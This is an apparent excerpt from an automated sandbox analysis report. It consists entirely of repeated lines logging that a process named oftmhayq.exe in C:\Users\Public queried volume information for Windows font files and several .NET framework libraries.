          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Users\Public\oftmhayq.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
